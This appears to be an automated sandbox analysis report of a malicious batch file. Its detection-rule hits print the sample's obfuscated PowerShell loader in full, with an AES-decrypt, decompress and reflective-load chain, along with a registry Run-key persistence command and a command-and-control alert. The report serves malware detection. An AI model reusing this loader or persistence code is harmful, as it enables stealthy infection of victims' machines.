Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 
'C:\Users\user\Desktop\rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] ('')); , CommandLine: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzx
Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:thuUFdhjXkHq{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$yFLwIFejWheBPy,[Parameter(Position=1)][Type]$NxINIPbKxv)$yMLVqpDcpHk=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+''+'l'+''+[Char](101)+'ct'+[Char](101)+'d'+'D'+''+[Char](101)+''+[Char](108)+'e'+[Char](103)+'a'+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+'M'+''+[Char](101)+''+[Char](109)+''+'o'+''+[Char](114)+'y'+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+'g'+[Char](97)+''+[Char](116)+''+[Char](101)+'T'+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+'a'+'s'+'s'+[Char](44)+''+[Char](80)+''+'u'+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+','+[Char](83)+''+[Char](101)+''+[Char](97)+''+'l'+''+'e'+''+[Char](100)+''+[Char](44)+'A'+[Char](110)+''+[Char](115)+'i'+[Char](67)+'l'+[Char](97)+''+'s'+''+'s'+''+','+''+[Char](65)+''+[Char](117)+'t'+[Char](111)+''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$yMLVqpDcpHk.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+'p'+''+[Char](101)+''+'c'+''+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+''+[Char](97)+''+[Char](109)+'e,'+'H'+''+'i'+''+[Char](100)+''+'e'+''+[Char](66)+''+'y'+'S'+[Char](105)+''+'g'+''+','+''+[Char](80)+'u'+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$yFLwIFejWheBPy).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+'me,M'+[Char](97)+''+'n'+''+'a'+''+[Char](103)+''+'e'+'d');$yMLVqpDcpHk.D
efineMethod(''+'I'+''+'n'+'v'+[Char](111)+'k'+[Char](101)+'',''+'P'+''+'u'+''+'b'+'li'+'c'+''+','+''+'H'+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+'y'+'S'+''+[Char](105)+''+'g'+''+[Char](44)+''+[Char](78)+''+'e'+''+'w'+''+[Char](83)+''+'l'+'o'+[Char](116)+','+'V'+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+'a'+''+[Char](108)+'',$NxINIPbKxv,$yFLwIFejWheBPy).SetImplementationFlags(''+[Char](82)+'unt'+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+'a'+''+'n'+'a'+[Char](103)+''+'e'+''+[Char](100)+'');Write-Output $yMLVqpDcpHk.CreateType();}$tBOzPEeXdclpo=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+'st'+'e'+''+'m'+''+'.'+''+[Char](100)+'l'+'l'+'')}).GetType(''+[Char](77)+'icr'+'o'+''+'s'+''+'o'+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+'W'+''+[Char](105)+'n'+[Char](51)+''+'2'+''+[Char](46)+''+[Char](85)+''+[Char](110)+''+[Char](115)+'af'+[Char](101)+''+[Char](78)+'a'+[Char](116)+''+'i'+''+'v'+''+'e'+'Met'+[Char](104)+''+'o'+''+[Char](100)+''+[Char](115)+'');$YOhLAkBIOfDYU
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:thuUFdhjXkHq{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$yFLwIFejWheBPy,[Parameter(Position=1)][Type]$NxINIPbKxv)$yMLVqpDcpHk=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+''+'l'+''+[Char](101)+'ct'+[Char](101)+'d'+'D'+''+[Char](101)+''+[Char](108)+'e'+[Char](103)+'a'+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+'M'+''+[Char](101)+''+[Char](109)+''+'o'+''+[Char](114)+'y'+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+'g'+[Char](97)+''+[Char](116)+''+[Char](101)+'T'+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+'a'+'s'+'s'+[Char](44)+''+[Char](80)+''+'u'+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+','+[Char](83)+''+[Char](101)+''+[Char](97)+''+'l'+''+'e'+''+[Char](100)+''+[Char](44)+'A'+[Char](110)+''+[Char](115)+'i'+[Char](67)+'l'+[Char](97)+''+'s'+''+'s'+''+','+''+[Char](65)+''+[Char](117)+'t'+[Char](111)+''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$yMLVqpDcpHk.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+'p'+''+[Char](101)+''+'c'+''+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+''+[Char](97)+''+[Char](109)+'e,'+'H'+''+'i'+''+[Char](100)+''+'e'+''+[Char](66)+''+'y'+'S'+[Char](105)+''+'g'+''+','+''+[Char](80)+'u'+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$yFLwIFejWheBPy).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+'me,M'+[Char](97)+''+'n'+''+'a'+''+[Char](103)+''+'e'+'d');$yMLVqpDcpHk.DefineMethod(''+'I'+''+'n'+'v'+[Char](111)+
'k'+[Char](101)+'',''+'P'+''+'u'+''+'b'+'li'+'c'+''+','+''+'H'+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+'y'+'S'+''+[Char](105)+''+'g'+''+[Char](44)+''+[Char](78)+''+'e'+''+'w'+''+[Char](83)+''+'l'+'o'+[Char](116)+','+'V'+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+'a'+''+[Char](108)+'',$NxINIPbKxv,$yFLwIFejWheBPy).SetImplementationFlags(''+[Char](82)+'unt'+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+'a'+''+'n'+'a'+[Char](103)+''+'e'+''+[Char](100)+'');Write-Output $yMLVqpDcpHk.CreateType();}$tBOzPEeXdclpo=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+'st'+'e'+''+'m'+''+'.'+''+[Char](100)+'l'+'l'+'')}).GetType(''+[Char](77)+'icr'+'o'+''+'s'+''+'o'+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+'W'+''+[Char](105)+'n'+[Char](51)+''+'2'+''+[Char](46)+''+[Char](85)+''+[Char](110)+''+[Char](115)+'af'+[Char](101)+''+[Char](78)+'a'+[Char](116)+''+'i'+''+'v'+''+'e'+'Met'+[Char](104)+''+'o'+''+[Char](100)+''+[Char](115)+'');$YOhLAkBIOfDYU
Source: Process started; Author: Florian Roth (Nextron Systems), Tim Shelton; Data: Command: "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F, CommandLine: "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F, CommandLine|base64offset|contains: 7z, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: powershell.exe -WindowStyle Hidden, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7088, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F, ProcessId: 3804, ProcessName: schtasks.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 
'C:\Users\user\Desktop\rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] ('')); , CommandLine: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzx
Source: File created; Author: Subhash Popuri (@pbssubhash); Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6444, TargetFilename: C:\Windows\$rbx-onimai2\$rbx-CO2.bat
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7088, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$rbx-XVR
Source: File created; Author: frack113, Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6444, TargetFilename: C:\Windows\$rbx-onimai2\$rbx-CO2.bat
Source: Registry Key set; Author: frack113, Florian Roth (Nextron Systems); Data: Details: cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7088, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$rbx-XVR
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\System32\dllhost.exe /Processid:{8d1ed557-2027-497c-a325-29d4d11b1321}, ParentImage: C:\Windows\System32\dllhost.exe, ParentProcessId: 6400, ParentProcessName: dllhost.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, ProcessId: 928, ProcessName: svchost.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: powershell.exe -WindowStyle Hidden, CommandLine: powershell.exe -WindowStyle Hidden, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rbx-CO2.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6824, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden, ProcessId: 6444, ProcessName: powershell.exe

Suricata IDS alerts

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-03T14:54:46.061887+0200 | 2035595 | 1 | Domain Observed Used for C2 Detected | 154.216.20.132 | 6969 | 192.168.2.6 | 59172 | TCP

AV Detection

Source: Submitted Sample; Integrated Neural Analysis Model: Matched 98.9% probability
Source: unknown; HTTPS traffic detected: 147.135.36.89:443 -> 192.168.2.6:59173 version: TLS 1.2
Source: Binary string: System.Configuration.Install.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Data.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000030.00000000.2811800023.0000022595840000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3402915190.0000022595840000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: d.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000030.00000000.2811800023.0000022595840000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3402915190.0000022595840000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbSystem.DirectoryServices.dll source: WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Windows.Forms.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.PowerShell.Security.pdb` source: WER8C9.tmp.dmp.27.dr
Source: Binary string: System.ServiceProcess.pdbp}Y source: WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Drawing.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Core.pdb`- source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.DirectoryServices.ni.pdbRSDS source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.Powershell.PSReadline.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000030.00000000.2811892265.000002259585D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3403906582.000002259585D000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Drawing.ni.pdbRSDS source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Configuration.Install.ni.pdbRSDSQ source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.pdbP< source: WER6AC3.tmp.dmp.11.dr
Source: Binary string: mscorlib.pdbh source: WER8C9.tmp.dmp.27.dr
Source: Binary string: System.Xml.ni.pdbRSDS# source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Core.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Numerics.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.DirectoryServices.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.ServiceProcess.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Numerics.pdbP source: WER6AC3.tmp.dmp.11.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000030.00000000.2811800023.0000022595840000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3402915190.0000022595840000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000030.00000000.2811800023.0000022595840000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3402915190.0000022595840000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdbRSDS[q source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: mscorlib.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000030.00000000.2811892265.000002259585D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3403906582.000002259585D000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.ServiceProcess.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Configuration.Install.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Xml.pdbP4 source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.Management.Infrastructure.ni.pdbRSDS source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000030.00000000.2811717839.000002259582B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3402005843.000002259582B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdbRSDS source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000030.00000000.2811800023.0000022595840000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3402915190.0000022595840000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Configuration.Install.pdbMicrosoft.PowerShell.Commands.Utility.dllH source: WER8C9.tmp.dmp.27.dr
Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000030.00000000.2811892265.000002259585D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3403906582.000002259585D000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb@y' source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.PowerShell.Security.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.PowerShell.Security.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Xml.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000030.00000000.2811717839.000002259582B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3402005843.000002259582B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.ni.pdbRSDS source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.DirectoryServices.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.CSharp.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Management.pdb`*?@_*? source: WER8C9.tmp.dmp.27.dr
Source: Binary string: System.Configuration.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Configuration.Install.pdbH source: WER6AC3.tmp.dmp.11.dr
Source: Binary string: +@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000030.00000000.2811717839.000002259582B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Data.ni.pdbRSDSC source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Data.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Configuration.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Xml.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbcache source: svchost.exe, 00000030.00000000.2811892265.000002259585D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3403906582.000002259585D000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Numerics.ni.pdbRSDSautg source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Data.pdbH source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Management.Automation.ni.pdbRSDS source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.ServiceProcess.ni.pdbRSDSwg source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Windows.Forms.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: 7\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000030.00000002.3402005843.000002259582B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: mscorlib.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
